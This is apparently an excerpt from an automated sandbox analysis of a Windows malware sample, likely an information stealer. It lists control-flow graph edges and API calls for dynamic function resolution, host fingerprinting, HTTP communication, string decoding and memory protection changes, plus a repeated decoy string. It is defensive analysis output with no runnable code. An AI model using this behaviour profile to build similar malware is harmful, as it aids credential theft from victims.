26961->26962 26963 40331b 26962->26963 26964 4045c0 34 API calls 26963->26964 26965 403334 26964->26965 26966 4045c0 34 API calls 26965->26966 26967 40334d 26966->26967 26968 4045c0 34 API calls 26967->26968 26969 403366 26968->26969 26970 4045c0 34 API calls 26969->26970 26971 40337f 26970->26971 26972 4045c0 34 API calls 26971->26972 26973 403398 26972->26973 26974 4045c0 34 API calls 26973->26974 26975 4033b1 26974->26975 26976 4045c0 34 API calls 26975->26976 26977 4033ca 26976->26977 26978 4045c0 34 API calls 26977->26978 26979 4033e3 26978->26979 26980 4045c0 34 API calls 
26979->26980 26981 4033fc 26980->26981 26982 4045c0 34 API calls 26981->26982 26983 403415 26982->26983 26984 4045c0 34 API calls 26983->26984 26985 40342e 26984->26985 26986 4045c0 34 API calls 26985->26986 26987 403447 26986->26987 26988 4045c0 34 API calls 26987->26988 26989 403460 26988->26989 26990 4045c0 34 API calls 26989->26990 26991 403479 26990->26991 26992 4045c0 34 API calls 26991->26992 26993 403492 26992->26993 26994 4045c0 34 API calls 26993->26994 26995 4034ab 26994->26995 26996 4045c0 34 API calls 26995->26996 26997 4034c4 26996->26997 26998 4045c0 34 API calls 26997->26998 26999 4034dd 26998->26999 27000 4045c0 34 API calls 26999->27000 27001 4034f6 27000->27001 27002 4045c0 34 API calls 27001->27002 27003 40350f 27002->27003 27004 4045c0 34 API calls 27003->27004 27005 403528 27004->27005 27006 4045c0 34 API calls 27005->27006 27007 403541 27006->27007 27008 4045c0 34 API calls 27007->27008 27009 40355a 27008->27009 27010 4045c0 34 API calls 27009->27010 27011 403573 27010->27011 27012 4045c0 34 API calls 27011->27012 27013 40358c 27012->27013 27014 4045c0 34 API calls 27013->27014 27015 4035a5 27014->27015 27016 4045c0 34 API calls 27015->27016 27017 4035be 27016->27017 27018 4045c0 34 API calls 27017->27018 27019 4035d7 27018->27019 27020 4045c0 34 API calls 27019->27020 27021 4035f0 27020->27021 27022 4045c0 34 API calls 27021->27022 27023 403609 27022->27023 27024 4045c0 34 API calls 27023->27024 27025 403622 27024->27025 27026 4045c0 34 API calls 27025->27026 27027 40363b 27026->27027 27028 4045c0 34 API calls 27027->27028 27029 403654 27028->27029 27030 4045c0 34 API calls 27029->27030 27031 40366d 27030->27031 27032 4045c0 34 API calls 27031->27032 27033 403686 27032->27033 27034 4045c0 34 API calls 27033->27034 27035 40369f 27034->27035 27036 4045c0 34 API calls 27035->27036 27037 4036b8 27036->27037 27038 4045c0 34 API calls 27037->27038 27039 4036d1 27038->27039 27040 4045c0 34 API calls 27039->27040 27041 4036ea 27040->27041 27042 
4045c0 34 API calls 27041->27042 27043 403703 27042->27043 27044 4045c0 34 API calls 27043->27044 27045 40371c 27044->27045 27046 4045c0 34 API calls 27045->27046 27047 403735 27046->27047 27048 4045c0 34 API calls 27047->27048 27049 40374e 27048->27049 27050 4045c0 34 API calls 27049->27050 27051 403767 27050->27051 27052 4045c0 34 API calls 27051->27052 27053 403780 27052->27053 27054 4045c0 34 API calls 27053->27054 27055 403799 27054->27055 27056 4045c0 34 API calls 27055->27056 27057 4037b2 27056->27057 27058 4045c0 34 API calls 27057->27058 27059 4037cb 27058->27059 27060 4045c0 34 API calls 27059->27060 27061 4037e4 27060->27061 27062 4045c0 34 API calls 27061->27062 27063 4037fd 27062->27063 27064 4045c0 34 API calls 27063->27064 27065 403816 27064->27065 27066 4045c0 34 API calls 27065->27066 27067 40382f 27066->27067 27068 4045c0 34 API calls 27067->27068 27069 403848 27068->27069 27070 4045c0 34 API calls 27069->27070 27071 403861 27070->27071 27072 4045c0 34 API calls 27071->27072 27073 40387a 27072->27073 27074 4045c0 34 API calls 27073->27074 27075 403893 27074->27075 27076 4045c0 34 API calls 27075->27076 27077 4038ac 27076->27077 27078 4045c0 34 API calls 27077->27078 27079 4038c5 27078->27079 27080 4045c0 34 API calls 27079->27080 27081 4038de 27080->27081 27082 4045c0 34 API calls 27081->27082 27083 4038f7 27082->27083 27084 4045c0 34 API calls 27083->27084 27085 403910 27084->27085 27086 4045c0 34 API calls 27085->27086 27087 403929 27086->27087 27088 4045c0 34 API calls 27087->27088 27089 403942 27088->27089 27090 4045c0 34 API calls 27089->27090 27091 40395b 27090->27091 27092 4045c0 34 API calls 27091->27092 27093 403974 27092->27093 27094 4045c0 34 API calls 27093->27094 27095 40398d 27094->27095 27096 4045c0 34 API calls 27095->27096 27097 4039a6 27096->27097 27098 4045c0 34 API calls 27097->27098 27099 4039bf 27098->27099 27100 4045c0 34 API calls 27099->27100 27101 4039d8 27100->27101 27102 4045c0 34 API calls 27101->27102 27103 4039f1 
27102->27103 27104 4045c0 34 API calls 27103->27104 27105 403a0a 27104->27105 27106 4045c0 34 API calls 27105->27106 27107 403a23 27106->27107 27108 4045c0 34 API calls 27107->27108 27109 403a3c 27108->27109 27110 4045c0 34 API calls 27109->27110 27111 403a55 27110->27111 27112 4045c0 34 API calls 27111->27112 27113 403a6e 27112->27113 27114 4045c0 34 API calls 27113->27114 27115 403a87 27114->27115 27116 4045c0 34 API calls 27115->27116 27117 403aa0 27116->27117 27118 4045c0 34 API calls 27117->27118 27119 403ab9 27118->27119 27120 4045c0 34 API calls 27119->27120 27121 403ad2 27120->27121 27122 4045c0 34 API calls 27121->27122 27123 403aeb 27122->27123 27124 4045c0 34 API calls 27123->27124 27125 403b04 27124->27125 27126 4045c0 34 API calls 27125->27126 27127 403b1d 27126->27127 27128 4045c0 34 API calls 27127->27128 27129 403b36 27128->27129 27130 4045c0 34 API calls 27129->27130 27131 403b4f 27130->27131 27132 4045c0 34 API calls 27131->27132 27133 403b68 27132->27133 27134 4045c0 34 API calls 27133->27134 27135 403b81 27134->27135 27136 4045c0 34 API calls 27135->27136 27137 403b9a 27136->27137 27138 4045c0 34 API calls 27137->27138 27139 403bb3 27138->27139 27140 4045c0 34 API calls 27139->27140 27141 403bcc 27140->27141 27142 4045c0 34 API calls 27141->27142 27143 403be5 27142->27143 27144 4045c0 34 API calls 27143->27144 27145 403bfe 27144->27145 27146 4045c0 34 API calls 27145->27146 27147 403c17 27146->27147 27148 4045c0 34 API calls 27147->27148 27149 403c30 27148->27149 27150 4045c0 34 API calls 27149->27150 27151 403c49 27150->27151 27152 4045c0 34 API calls 27151->27152 27153 403c62 27152->27153 27154 4045c0 34 API calls 27153->27154 27155 403c7b 27154->27155 27156 4045c0 34 API calls 27155->27156 27157 403c94 27156->27157 27158 4045c0 34 API calls 27157->27158 27159 403cad 27158->27159 27160 4045c0 34 API calls 27159->27160 27161 403cc6 27160->27161 27162 4045c0 34 API calls 27161->27162 27163 403cdf 27162->27163 27164 4045c0 34 API calls 
27163->27164 27165 403cf8 27164->27165 27166 4045c0 34 API calls 27165->27166 27167 403d11 27166->27167 27168 4045c0 34 API calls 27167->27168 27169 403d2a 27168->27169 27170 4045c0 34 API calls 27169->27170 27171 403d43 27170->27171 27172 4045c0 34 API calls 27171->27172 27173 403d5c 27172->27173 27174 4045c0 34 API calls 27173->27174 27175 403d75 27174->27175 27176 4045c0 34 API calls 27175->27176 27177 403d8e 27176->27177 27178 4045c0 34 API calls 27177->27178 27179 403da7 27178->27179 27180 4045c0 34 API calls 27179->27180 27181 403dc0 27180->27181 27182 4045c0 34 API calls 27181->27182 27183 403dd9 27182->27183 27184 4045c0 34 API calls 27183->27184 27185 403df2 27184->27185 27186 4045c0 34 API calls 27185->27186 27187 403e0b 27186->27187 27188 4045c0 34 API calls 27187->27188 27189 403e24 27188->27189 27190 4045c0 34 API calls 27189->27190 27191 403e3d 27190->27191 27192 4045c0 34 API calls 27191->27192 27193 403e56 27192->27193 27194 4045c0 34 API calls 27193->27194 27195 403e6f 27194->27195 27196 4045c0 34 API calls 27195->27196 27197 403e88 27196->27197 27198 4045c0 34 API calls 27197->27198 27199 403ea1 27198->27199 27200 4045c0 34 API calls 27199->27200 27201 403eba 27200->27201 27202 4045c0 34 API calls 27201->27202 27203 403ed3 27202->27203 27204 4045c0 34 API calls 27203->27204 27205 403eec 27204->27205 27206 4045c0 34 API calls 27205->27206 27207 403f05 27206->27207 27208 4045c0 34 API calls 27207->27208 27209 403f1e 27208->27209 27210 4045c0 34 API calls 27209->27210 27211 403f37 27210->27211 27212 4045c0 34 API calls 27211->27212 27213 403f50 27212->27213 27214 4045c0 34 API calls 27213->27214 27215 403f69 27214->27215 27216 4045c0 34 API calls 27215->27216 27217 403f82 27216->27217 27218 4045c0 34 API calls 27217->27218 27219 403f9b 27218->27219 27220 4045c0 34 API calls 27219->27220 27221 403fb4 27220->27221 27222 4045c0 34 API calls 27221->27222 27223 403fcd 27222->27223 27224 4045c0 34 API calls 27223->27224 27225 403fe6 27224->27225 27226 
4045c0 34 API calls 27225->27226 27227 403fff 27226->27227 27228 4045c0 34 API calls 27227->27228 27229 404018 27228->27229 27230 4045c0 34 API calls 27229->27230 27231 404031 27230->27231 27232 4045c0 34 API calls 27231->27232 27233 40404a 27232->27233 27234 4045c0 34 API calls 27233->27234 27235 404063 27234->27235 27236 4045c0 34 API calls 27235->27236 27237 40407c 27236->27237 27238 4045c0 34 API calls 27237->27238 27239 404095 27238->27239 27240 4045c0 34 API calls 27239->27240 27241 4040ae 27240->27241 27242 4045c0 34 API calls 27241->27242 27243 4040c7 27242->27243 27244 4045c0 34 API calls 27243->27244 27245 4040e0 27244->27245 27246 4045c0 34 API calls 27245->27246 27247 4040f9 27246->27247 27248 4045c0 34 API calls 27247->27248 27249 404112 27248->27249 27250 4045c0 34 API calls 27249->27250 27251 40412b 27250->27251 27252 4045c0 34 API calls 27251->27252 27253 404144 27252->27253 27254 4045c0 34 API calls 27253->27254 27255 40415d 27254->27255 27256 4045c0 34 API calls 27255->27256 27257 404176 27256->27257 27258 4045c0 34 API calls 27257->27258 27259 40418f 27258->27259 27260 4045c0 34 API calls 27259->27260 27261 4041a8 27260->27261 27262 4045c0 34 API calls 27261->27262 27263 4041c1 27262->27263 27264 4045c0 34 API calls 27263->27264 27265 4041da 27264->27265 27266 4045c0 34 API calls 27265->27266 27267 4041f3 27266->27267 27268 4045c0 34 API calls 27267->27268 27269 40420c 27268->27269 27270 4045c0 34 API calls 27269->27270 27271 404225 27270->27271 27272 4045c0 34 API calls 27271->27272 27273 40423e 27272->27273 27274 4045c0 34 API calls 27273->27274 27275 404257 27274->27275 27276 4045c0 34 API calls 27275->27276 27277 404270 27276->27277 27278 4045c0 34 API calls 27277->27278 27279 404289 27278->27279 27280 4045c0 34 API calls 27279->27280 27281 4042a2 27280->27281 27282 4045c0 34 API calls 27281->27282 27283 4042bb 27282->27283 27284 4045c0 34 API calls 27283->27284 27285 4042d4 27284->27285 27286 4045c0 34 API calls 27285->27286 27287 4042ed 
27286->27287 27288 4045c0 34 API calls 27287->27288 27289 404306 27288->27289 27290 4045c0 34 API calls 27289->27290 27291 40431f 27290->27291 27292 4045c0 34 API calls 27291->27292 27293 404338 27292->27293 27294 4045c0 34 API calls 27293->27294 27295 404351 27294->27295 27296 4045c0 34 API calls 27295->27296 27297 40436a 27296->27297 27298 4045c0 34 API calls 27297->27298 27299 404383 27298->27299 27300 4045c0 34 API calls 27299->27300 27301 40439c 27300->27301 27302 4045c0 34 API calls 27301->27302 27303 4043b5 27302->27303 27304 4045c0 34 API calls 27303->27304 27305 4043ce 27304->27305 27306 4045c0 34 API calls 27305->27306 27307 4043e7 27306->27307 27308 4045c0 34 API calls 27307->27308 27309 404400 27308->27309 27310 4045c0 34 API calls 27309->27310 27311 404419 27310->27311 27312 4045c0 34 API calls 27311->27312 27313 404432 27312->27313 27314 4045c0 34 API calls 27313->27314 27315 40444b 27314->27315 27316 4045c0 34 API calls 27315->27316 27317 404464 27316->27317 27318 4045c0 34 API calls 27317->27318 27319 40447d 27318->27319 27320 4045c0 34 API calls 27319->27320 27321 404496 27320->27321 27322 4045c0 34 API calls 27321->27322 27323 4044af 27322->27323 27324 4045c0 34 API calls 27323->27324 27325 4044c8 27324->27325 27326 4045c0 34 API calls 27325->27326 27327 4044e1 27326->27327 27328 4045c0 34 API calls 27327->27328 27329 4044fa 27328->27329 27330 4045c0 34 API calls 27329->27330 27331 404513 27330->27331 27332 4045c0 34 API calls 27331->27332 27333 40452c 27332->27333 27334 4045c0 34 API calls 27333->27334 27335 404545 27334->27335 27336 4045c0 34 API calls 27335->27336 27337 40455e 27336->27337 27338 4045c0 34 API calls 27337->27338 27339 404577 27338->27339 27340 4045c0 34 API calls 27339->27340 27341 404590 27340->27341 27342 4045c0 34 API calls 27341->27342 27343 4045a9 27342->27343 27344 419c10 27343->27344 27345 419c20 43 API calls 27344->27345 27346 41a036 8 API calls 27344->27346 27345->27346 27347 41a146 27346->27347 27348 41a0cc 
GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27346->27348 27349 41a153 8 API calls 27347->27349 27350 41a216 27347->27350 27348->27347 27349->27350 27351 41a298 27350->27351 27352 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27350->27352 27353 41a2a5 6 API calls 27351->27353 27354 41a337 27351->27354 27352->27351 27353->27354 27355 41a344 9 API calls 27354->27355 27356 41a41f 27354->27356 27355->27356 27357 41a4a2 27356->27357 27358 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27356->27358 27359 41a4ab GetProcAddress GetProcAddress 27357->27359 27360 41a4dc 27357->27360 27358->27357 27359->27360 27361 41a515 27360->27361 27362 41a4e5 GetProcAddress GetProcAddress 27360->27362 27363 41a612 27361->27363 27364 41a522 10 API calls 27361->27364 27362->27361 27365 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27363->27365 27366 41a67d 27363->27366 27364->27363 27365->27366 27367 41a686 GetProcAddress 27366->27367 27368 41a69e 27366->27368 27367->27368 27369 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27368->27369 27370 415ca3 27368->27370 27369->27370 27371 401590 27370->27371 27646 401670 27371->27646 27374 41a7a0 lstrcpy 27375 4015b5 27374->27375 27376 41a7a0 lstrcpy 27375->27376 27377 4015c7 27376->27377 27378 41a7a0 lstrcpy 27377->27378 27379 4015d9 27378->27379 27380 41a7a0 lstrcpy 27379->27380 27381 401663 27380->27381 27382 415510 27381->27382 27383 415521 27382->27383 27384 41a820 2 API calls 27383->27384 27385 41552e 27384->27385 27386 41a820 2 API calls 27385->27386 27387 41553b 27386->27387 27388 41a820 2 API calls 27387->27388 27389 415548 27388->27389 27390 41a740 lstrcpy 27389->27390 27391 415555 27390->27391 27392 41a740 lstrcpy 27391->27392 27393 415562 27392->27393 27394 41a740 lstrcpy 27393->27394 27395 41556f 27394->27395 27396 41a740 lstrcpy 27395->27396 27436 41557c 27396->27436 27397 41a740 lstrcpy 
[Control-flow graph edge data omitted; recoverable call sites by basic block:]
• 415643-415a52: chain of StrCmpCA comparisons interleaved with lstrcpy/lstrlenA helper calls (41a820, 41a8a0, 401670), with a Sleep branch at 415a16
• 417553: GetVolumeInformationA, then GetProcessHeap/HeapAlloc and wsprintfA
• 4047b0-404e67: InternetCrackUrlA (404848), InternetOpenA (40490b), GetSystemTime (418b60), InternetConnectA (404aa3), HttpOpenRequestA (404ad3), HttpSendRequestA (404e13), InternetReadFile (404e32), InternetCloseHandle (404e67, 404ebe, 404ecb); CryptStringToBinaryA with LocalAlloc/LocalFree at 409ac0
• 4117c4-41199e: StrCmpCA with an ExitProcess branch (4117cf), then a strtok_s loop over further StrCmpCA comparisons
• 401190: GetProcessHeap/HeapAlloc/GetComputerNameA (4178e0) and GetUserNameA (417850), with an ExitProcess branch (4011c4)
• 2f00005-2f008c7: GetPEB, SetErrorMode, VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA
• other nodes: RaiseException/__CxxThrowException@8 (4088a4), GetProcessHeap/HeapFree (4180a5), RtlUnwind (41b9b0), ExitProcess (2f16a0a)

                                                  Control-flow Graph

                                                  APIs
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                                  • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                                  • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                                  • strlen.MSVCRT ref: 004046F0
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                                  Strings
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist 